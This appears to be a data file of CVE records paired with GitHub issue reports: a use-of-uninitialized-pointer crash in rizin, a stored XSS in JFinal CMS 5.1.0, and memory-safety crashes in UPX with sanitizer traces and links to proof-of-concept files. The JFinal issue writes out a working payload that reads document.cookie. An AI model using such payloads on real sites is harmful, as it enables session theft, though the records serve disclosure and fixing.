### Work environment With @ogianatiempo we discovered a bug which makes rizin crash when analyzing certain kind of binaries. | Questions | Answers |------------------------------------------------------|-------------------- | OS/arch/bits (mandatory) | Ubuntu 20.04 x86_64 64 | File format of the file you reverse (mandatory) | ELF64 | Architecture/bits of the file (mandatory) | HPPA | `rizin -v` full output, **not truncated** (mandatory) | rizin 0.4.0-git @ linux-x86-64 commit: 681de8e3b21023b5a35f9eaf02960f2ef9fe96ee, build: 2021-11-23__11:49:48 ### Expected behavior Running `aaa` on an ELF64 file shouldn't make rizin crash. ### Actual behavior Rizin segfaults. ### Steps to reproducebinary the behavior Run `aaa` (or start rizin with the `-A` flag) with the binary named `crash` attached below. ### Additional Logs, screenshots, source code, configuration dump, ... The crash happens in the file `librz/core/analysis_tp.c` at line 950. When analyzing the binary attached below, the `goto` at line 849 is executed, but then at line 950 `free` is called with `retctx.ret_reg` as an argument. The problem is that `retctx.ret_reg` only gets initialized at line 860, but that line never gets executed because the `goto` gets executed first. As a result of this, whatever was on the stack at that time gets `free`ed (for example, in the statically linked release version for linux, the block size will be the value that gets `free`ed). So far, we've only seen the crash happen on a `HPPA` binary. In the archive attached to this issue, we modified the elf header and set the architecture to `amd64` and that binary doesn't seem to crash. Here's a bit of information about both binaries: ``` $ binwalk -W crash nocrash OFFSET crash nocrash -------------------------------------------------------------------------------- 0x00000000 7F 45 4C 46 02 30 30 30 30 30 30 30 30 30 30 30 |.ELF.00000000000| \ 7F 45 4C 46 02 30 30 30 30 30 30 30 30 30 30 30 |.ELF.00000000000| 0x00000010 30 30 0F 00 30 30 30 30 30 30 30 30 30 30 30 30 |00..000000000000| / 30 30 3E 00 30 30 30 30 30 30 30 30 30 30 30 30 |00>.000000000000| 0x00000020 40 00 00 00 00 00 00 00 30 30 30 30 30 30 30 30 |@.......00000000| \ 40 00 00 00 00 00 00 00 30 30 30 30 30 30 30 30 |@.......00000000| 0x00000030 30 30 30 30 30 30 30 30 02 00 30 30 30 30 30 30 |00000000..000000| / 30 30 30 30 30 30 30 30 02 00 30 30 30 30 30 30 |00000000..000000| 0x00000040 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000| \ 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000| 0x00000050 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000| / 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000| 0x00000060 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000| \ 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000| 0x00000070 30 30 30 30 30 30 30 30 01 00 00 00 05 30 30 30 |00000000.....000| / 30 30 30 30 30 30 30 30 01 00 00 00 05 30 30 30 |00000000.....000| 0x00000080 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000| \ 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000| 0x00000090 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000| / 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000| 0x000000A0 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000| \ 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 |0000000000000000| ``` (the only difference is the target architecture) ``` $ readelf -h crash ... Machine: HPPA ... $ readelf -h nocrash ... Machine: Advanced Micro Devices X86-64 ... ``` And here's the crash in action: ``` $ ~/rizin/build/binrz/rizin/rizin -A crash [x] Analyze all flags starting with sym. and entry0 (aa) [x] Analyze function calls (aac) [Skipping huge ranges of instructions for references (aar) [x] Analyze len bytes of instructions for references (aar) [x] Check for classes [x] Finding xrefs in noncode section with analysis.in=io.maps [x] Analyze value pointers (aav) [Warning: Skipping large region30 to 0x6060606060606060 (aav) [Cannot find program counter register in the current profile. [x] Emulate functions to find computed references (aaef) [Segmentation fault (core dumped)l functions (aaft) ``` As mentioned before, the binary with `amd64` in the header works well: ``` $ ~/rizin/build/binrz/rizin/rizin -A nocrash [x] Analyze all flags starting with sym. and entry0 (aa) [x] Analyze function calls (aac) [Skipping huge ranges of instructions for references (aar) [x] Analyze len bytes of instructions for references (aar) [x] Check for classes [x] Type matching analysis for all functions (aaft) [x] Propagate noreturn information [x] Use -AA or aaaa to perform additional experimental analysis. [0x3030303030303030]> ``` [binaries.zip](https://github.com/rizinorg/rizin/files/7589045/binaries.zip)
CVE-2021-4022: Segfault when analyzing an ELF64 for HPPA architecture
https://api.github.com/repos/rizinorg/rizin/issues/2015/comments
9
2021-11-23T15:46:59Z
2021-11-29T12:15:17Z
https://github.com/rizinorg/rizin/issues/2015
1,061,438,966
2,015
4,043
CVE-2022-36527
2022-08-25T19:15:08.483
Jfinal CMS v5.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the post title text field under the publish blog module.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/45" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/45" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/jflyfox/jfinal_cms/issues/45
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jflyfox", "jfinal_cms" ]
There is a stored XSS vulnerability in JFinal_cms 's publish blog module. An attacker could insert malicious XSS code into the post title. When users and administrators view the blog post, the malicious XSS code is triggered successfully. First register a user to test it, then go to the submit blog post page and insert the malicious XSS code in the subject field Payload : `test1" onmouseover="alert(document.cookie)` ![202207181054488](https://user-images.githubusercontent.com/58295122/179446195-1986fe5b-e79f-4ce8-b472-aba00ccde3ca.png) Successfully executed malicious XSS code: ![202207181100094](https://user-images.githubusercontent.com/58295122/179446206-a881f5d2-82c6-430c-8d3e-a6ebacfb3676.png)
XSS vulnerability1 in jfinal_cms 5.1.0
https://api.github.com/repos/jflyfox/jfinal_cms/issues/45/comments
0
2022-07-18T04:43:11Z
2022-07-18T04:43:11Z
https://github.com/jflyfox/jfinal_cms/issues/45
1,307,399,442
45
4,044
CVE-2020-27796
2022-08-25T20:15:08.487
A heap-based buffer over-read was discovered in the invert_pt_dynamic function in p_lx_elf.cpp in UPX 4.0.0 via a crafted Mach-O file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/392" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/392" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D3527302-7874-4400-B123-99C1CA6FE8EB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/upx/upx/issues/392
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
Author: giantbranch of NSFOCUS Security Team ## What's the problem (or question)? A heap buffer overflow in the latest commit of the devel branch ASAN reports: ``` ==21202==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62f00000c530 at pc 0x00000058b076 bp 0x7ffdc9ecf670 sp 0x7ffdc9ecf668 READ of size 4 at 0x62f00000c530 thread T0 #0 0x58b075 in PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const*) /src/upx-multi/src/p_lx_elf.cpp:1676:25 #1 0x588959 in PackLinuxElf32::PackLinuxElf32help1(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:305:13 #2 0x5d5e74 in PackLinuxElf32Le::PackLinuxElf32Le(InputFile*) /src/upx-multi/src/./p_lx_elf.h:395:9 #3 0x5d5e74 in PackLinuxElf32x86::PackLinuxElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4838:54 #4 0x5d6261 in PackBSDElf32x86::PackBSDElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4855:50 #5 0x5d6261 in PackFreeBSDElf32x86::PackFreeBSDElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4866:58 #6 0x6e4460 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /src/upx-multi/src/packmast.cpp:190:9 #7 0x6e8ff1 in PackMaster::getUnpacker(InputFile*) /src/upx-multi/src/packmast.cpp:248:18 #8 0x6e8ff1 in PackMaster::unpack(OutputFile*) /src/upx-multi/src/packmast.cpp:266:9 #9 0x75826b in do_one_file(char const*, char*) /src/upx-multi/src/work.cpp:160:12 #10 0x7597c2 in do_files(int, int, char**) /src/upx-multi/src/work.cpp:271:13 #11 0x555aed in main /src/upx-multi/src/main.cpp:1538:5 #12 0x7efe5d03d83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #13 0x41ce98 in _start (/out/upx-multi/upx-multi+0x41ce98) 0x62f00000c532 is located 0 bytes to the right of 49458-byte region [0x62f000000400,0x62f00000c532) allocated by thread T0 here: #0 0x49519d in malloc (/out/upx-multi/upx-multi+0x49519d) #1 0x569797 in MemBuffer::alloc(unsigned long long) /src/upx-multi/src/mem.cpp:194:42 SUMMARY: AddressSanitizer: heap-buffer-overflow /src/upx-multi/src/p_lx_elf.cpp:1676:25 in PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const*) Shadow bytes around the buggy address: 0x0c5e7fff9850: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5e7fff9860: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5e7fff9870: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5e7fff9880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c5e7fff9890: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c5e7fff98a0: 00 00 00 00 00 00[02]fa fa fa fa fa fa fa fa fa 0x0c5e7fff98b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c5e7fff98c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c5e7fff98d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c5e7fff98e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c5e7fff98f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==21202==ABORTING ``` ## What should have happened? Check if the file is normal, exit if abnormal ## Do you have an idea for a solution? Add more checks ## How can we reproduce the issue? upx.out -d <poc_filename> poc: [tests_07edd5f520df09443f3622129449d21c6b7c3c7c_.tar.gz](https://github.com/upx/upx/files/4964648/tests_07edd5f520df09443f3622129449d21c6b7c3c7c_.tar.gz) ## Please tell us details about your environment. * UPX version used (`upx --version`): ``` upx 4.0.0-git-87b73e5cfdc1+ UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer Copyright (C) 1996-2020 Laszlo Molnar Copyright (C) 2000-2020 John F. Reiser Copyright (C) 2002-2020 Jens Medoch Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler Copyright (C) 1999-2006 Igor Pavlov UPX comes with ABSOLUTELY NO WARRANTY; for details t ``` * Host Operating System and version: Ubuntu 16.04.2 LTS * Host CPU architecture: x86_64 * Target Operating System and version: same as Host * Target CPU architecture: same as Host
Heap buffer overflow in PackLinuxElf32::invert_pt_dynamic
https://api.github.com/repos/upx/upx/issues/392/comments
1
2020-07-23T08:29:53Z
2020-08-06T06:29:46Z
https://github.com/upx/upx/issues/392
664,292,638
392
4,045
CVE-2020-27797
2022-08-25T20:15:08.537
An invalid memory address reference was discovered in the elf_lookup function in p_lx_elf.cpp in UPX 4.0.0 via a crafted Mach-O file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/390" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/390" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D3527302-7874-4400-B123-99C1CA6FE8EB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "763" ]
763
https://github.com/upx/upx/issues/390
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
Author: giantbranch of NSFOCUS Security Team ## What's the problem (or question)? Segmentation fault in PackLinuxElf32::elf_lookup(char const*) of /src/p_lx_elf.cpp in the latest commit of the devel branch code link : [p_lx_elf.cpp#L5486](https://github.com/upx/upx/blob/87b73e5cfdc12da94c251b2cd83bb01c7d9f616c/src/p_lx_elf.cpp#L5486) ``` for (si= get_te32(&buckets[m]); 0!=si; si= get_te32(&chains[si])) { char const *const p= get_dynsym_name(si, (unsigned)-1); if (0==strcmp(name, p)) { return &dynsym[si]; } } ``` get_dynsym_name returned an unreadable value and causing crash in strcmp ASAN reports: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==2661==ERROR: AddressSanitizer: SEGV on unknown address 0x6300849b4477 (pc 0x000000430045 bp 0x7ffda416e910 sp 0x7ffda416e0b0 T0) ==2661==The signal is caused by a READ memory access. #0 0x430045 in strcmp (/out/upx-multi/upx-multi+0x430045) #1 0x5d9589 in PackLinuxElf32::elf_lookup(char const*) const /src/upx-multi/src/p_lx_elf.cpp:5411:20 #2 0x588c27 in PackLinuxElf32::PackLinuxElf32help1(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:318:26 #3 0x5d5e74 in PackLinuxElf32Le::PackLinuxElf32Le(InputFile*) /src/upx-multi/src/./p_lx_elf.h:395:9 #4 0x5d5e74 in PackLinuxElf32x86::PackLinuxElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4838:54 #5 0x5d6261 in PackBSDElf32x86::PackBSDElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4855:50 #6 0x5d6261 in PackFreeBSDElf32x86::PackFreeBSDElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4866:58 #7 0x6e4460 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /src/upx-multi/src/packmast.cpp:190:9 #8 0x6e8ff1 in PackMaster::getUnpacker(InputFile*) /src/upx-multi/src/packmast.cpp:248:18 #9 0x6e8ff1 in PackMaster::unpack(OutputFile*) /src/upx-multi/src/packmast.cpp:266:9 #10 0x75826b in do_one_file(char const*, char*) /src/upx-multi/src/work.cpp:160:12 #11 0x7597c2 in do_files(int, int, char**) /src/upx-multi/src/work.cpp:271:13 #12 0x555aed in main /src/upx-multi/src/main.cpp:1538:5 #13 0x7fee2eaed83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #14 0x41ce98 in _start (/out/upx-multi/upx-multi+0x41ce98) ``` ## What should have happened? Check if the file is normal, exit if abnormal ## Do you have an idea for a solution? Add more checks ## How can we reproduce the issue? POC: [tests_282bb5f42e6d0cfdae8234bd333f76d50d69d1fa_.tar.gz](https://github.com/upx/upx/files/4964506/tests_282bb5f42e6d0cfdae8234bd333f76d50d69d1fa_.tar.gz) ``` # ./src/upx.out -d ./tests_282bb5f42e6d0cfdae8234bd333f76d50d69d1fa_ Ultimate Packer for eXecutables Copyright (C) 1996 - 2020 UPX git-87b73e Markus Oberhumer, Laszlo Molnar & John Reiser Jan 24th 2020 File size Ratio Format Name -------------------- ------ ----------- ----------- Segmentation fault ``` ## Please tell us details about your environment. * UPX version used (`upx --version`): ``` upx 4.0.0-git-87b73e5cfdc1+ UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer Copyright (C) 1996-2020 Laszlo Molnar Copyright (C) 2000-2020 John F. Reiser Copyright (C) 2002-2020 Jens Medoch Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler Copyright (C) 1999-2006 Igor Pavlov UPX comes with ABSOLUTELY NO WARRANTY; for details t ``` * Host Operating System and version: Ubuntu 16.04.2 LTS * Host CPU architecture: x86_64 * Target Operating System and version: same as Host * Target CPU architecture: same as Host
Segmentation fault in PackLinuxElf32::elf_lookup(char const*) of /src/p_lx_elf.cpp
https://api.github.com/repos/upx/upx/issues/390/comments
2
2020-07-23T08:06:10Z
2020-08-06T06:28:39Z
https://github.com/upx/upx/issues/390
664,279,490
390
4,046
CVE-2020-27798
2022-08-25T20:15:08.583
An invalid memory address reference was discovered in the adjABS function in p_lx_elf.cpp in UPX 4.0.0 via a crafted Mach-O file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/396" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/396" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D3527302-7874-4400-B123-99C1CA6FE8EB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "763" ]
763
https://github.com/upx/upx/issues/396
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
Author: giantbranch of NSFOCUS Security Team ## What's the problem (or question)? Segmentation fault in PackLinuxElf64::adjABS of p_lx_elf.cpp in the latest commit of the devel branch code: ``` ────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]────────────────────────────────────────────────────────────── RAX 0x53be80 (abs_symbol_names) ◂— pop rdi /* '__bss_end__' */ RBX 0xe8cf RCX 0xff RDX 0x0 *RDI 0x53be80 (abs_symbol_names) ◂— pop rdi /* '__bss_end__' */ RSI 0xff R8 0xa9d79 R9 0x98c32 R10 0x86f R11 0x246 R12 0xff R13 0x7fffffffe440 ◂— 0x3 R14 0x0 R15 0x0 RBP 0x7fffffffd450 —▸ 0x7fffffffd660 —▸ 0x7fffffffd680 —▸ 0x7fffffffd6a0 —▸ 0x7fffffffdea0 ◂— ... RSP 0x7fffffffd420 —▸ 0x7ffff7fb506e ◂— 0x40fffffff1 *RIP 0x442e5e ◂— call 0x401fd0 ─────────────────────────────────────────────────────────────────────────────────[ DISASM ]──────────────────────────────────────────────────────────────── 0x442e47 lea rax, [rdx*8] 0x442e4f sub rax, rdx 0x442e52 add rax, abs_symbol_names <0x53be80> 0x442e58 mov rsi, rcx 0x442e5b mov rdi, rax ► 0x442e5e call strcmp@plt <0x401fd0> s1: 0x53be80 (abs_symbol_names) ◂— '__bss_end__' s2: 0xff 0x442e63 test eax, eax 0x442e65 sete al 0x442e68 test al, al 0x442e6a je 0x442e89 0x442e6c mov eax, dword ptr [rbp - 0x24] ──────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]──────────────────────────────────────────────────────────── 3132 int 3133 PackLinuxElf64::adjABS(Elf64_Sym *sym, unsigned delta) 3134 { 3135 for (int j = 0; abs_symbol_names[j][0]; ++j) { 3136 unsigned st_name = get_te32(&sym->st_name); ► 3137 if (!strcmp(abs_symbol_names[j], get_str_name(st_name, (unsigned)-1))) { 3138 sym->st_value += delta; 3139 return 1; 3140 } 3141 } 3142 return 0; ──────────────────────────────────────────────────────────────────────────────────[ STACK ]──────────────────────────────────────────────────────────────── 00:0000│ rsp 0x7fffffffd420 —▸ 0x7ffff7fb506e ◂— 0x40fffffff1 01:0008│ 0x7fffffffd428 ◂— 0xfffff00000804fd8 02:0010│ 0x7fffffffd430 —▸ 0x7ffff7fb5068 ◂— 0xfff10000000000ff 03:0018│ 0x7fffffffd438 —▸ 0x817030 —▸ 0x53e1f8 —▸ 0x43af84 (PackLinuxElf64amd::~PackLinuxElf64amd()) ◂— push rbp 04:0020│ 0x7fffffffd440 —▸ 0x7ffff7fb506e ◂— 0x40fffffff1 05:0028│ 0x7fffffffd448 ◂— 0xff00000000 06:0030│ rbp 0x7fffffffd450 —▸ 0x7fffffffd660 —▸ 0x7fffffffd680 —▸ 0x7fffffffd6a0 —▸ 0x7fffffffdea0 ◂— ... 07:0038│ 0x7fffffffd458 —▸ 0x449fab (PackLinuxElf64::unpack(OutputFile*)+3259) ◂— add qword ptr [rbp - 0x158], 0x18 ────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]────────────────────────────────────────────────────────────── ► f 0 442e5e f 1 449fab PackLinuxElf64::unpack(OutputFile*)+3259 f 2 492eb2 Packer::doUnpack(OutputFile*)+90 f 3 49c5ab PackMaster::unpack(OutputFile*)+109 f 4 4b946e f 5 4b985f f 6 42aade main+746 f 7 7ffff727b840 __libc_start_main+240 ``` get_str_name returned an unreadable value and causing crash in strcmp In this poc, get_str_name return 0xff ASAN reports: ``` ==7880==ERROR: AddressSanitizer: SEGV on unknown address 0x0000000000ff (pc 0x000000430045 bp 0x7fff7a4d5050 sp 0x7fff7a4d47f0 T0) ==7880==The signal is caused by a READ memory access. ==7880==Hint: address points to the zero page. #0 0x430045 in strcmp (/out/upx-multi/upx-multi+0x430045) #1 0x5b6c98 in PackLinuxElf64::adjABS(N_Elf64::Sym<N_Elf::ElfITypes<LE16, LE32, LE64, LE64, LE64> >*, unsigned int) /src/upx-multi/src/p_lx_elf.cpp:3137:14 #2 0x5d06a9 in PackLinuxElf64::unpack(OutputFile*) /src/upx-multi/src/p_lx_elf.cpp:4611:25 #3 0x6c82b0 in Packer::doUnpack(OutputFile*) /src/upx-multi/src/packer.cpp:107:5 #4 0x7589f8 in do_one_file(char const*, char*) /src/upx-multi/src/work.cpp:160:12 #5 0x759f42 in do_files(int, int, char**) /src/upx-multi/src/work.cpp:271:13 #6 0x555afd in main /src/upx-multi/src/main.cpp:1538:5 #7 0x7fb3d16be83f in __libc_start_main /build/glibc-e6zv40/glibc-2.23/csu/../csu/libc-start.c:291 #8 0x41ce98 in _start (/out/upx-multi/upx-multi+0x41ce98) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/out/upx-multi/upx-multi+0x430045) in strcmp ==7880==ABORTING ``` ## What should have happened? Check if the file is normal, exit if abnormal ## Do you have an idea for a solution? Add more checks ## How can we reproduce the issue? POC: [tests_7bc36b368db6594ef16f8abfd694fc11e4dc9acb_.tar.gz](https://github.com/upx/upx/files/4971173/tests_7bc36b368db6594ef16f8abfd694fc11e4dc9acb_.tar.gz) ``` $ ./src/upx.out -d ./tests_7bc36b368db6594ef16f8abfd694fc11e4dc9acb_.tar.gz Ultimate Packer for eXecutables Copyright (C) 1996 - 2020 UPX git-8d1d60 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 24th 2020 File size Ratio Format Name -------------------- ------ ----------- ----------- Segmentation fault ``` ## Please tell us details about your environment. * UPX version used (`upx --version`): ``` upx 4.0.0-git-8d1d605b3d8c+ UCL data compression library 1.03 zlib data compression library 1.2.8 LZMA SDK version 4.43 Copyright (C) 1996-2020 Markus Franz Xaver Johannes Oberhumer Copyright (C) 1996-2020 Laszlo Molnar Copyright (C) 2000-2020 John F. Reiser Copyright (C) 2002-2020 Jens Medoch Copyright (C) 1995-2005 Jean-loup Gailly and Mark Adler Copyright (C) 1999-2006 Igor Pavlov UPX comes with ABSOLUTELY NO WARRANTY; for details type 'upx-multi -L'. ``` * Host Operating System and version: Ubuntu 16.04.2 LTS * Host CPU architecture: x86_64 * Target Operating System and version: same as Host * Target CPU architecture: same as Host
Segmentation fault in PackLinuxElf64::adjABS of p_lx_elf.cpp
https://api.github.com/repos/upx/upx/issues/396/comments
1
2020-07-24T09:28:47Z
2020-08-06T06:30:09Z
https://github.com/upx/upx/issues/396
665,044,143
396
4,047
CVE-2020-27799
2022-08-25T20:15:08.630
A heap-based buffer over-read was discovered in the acc_ua_get_be32 function in miniacc.h in UPX 4.0.0 via a crafted Mach-O file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "secalert@redhat.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/391" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/391" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D3527302-7874-4400-B123-99C1CA6FE8EB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/upx/upx/issues/391
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
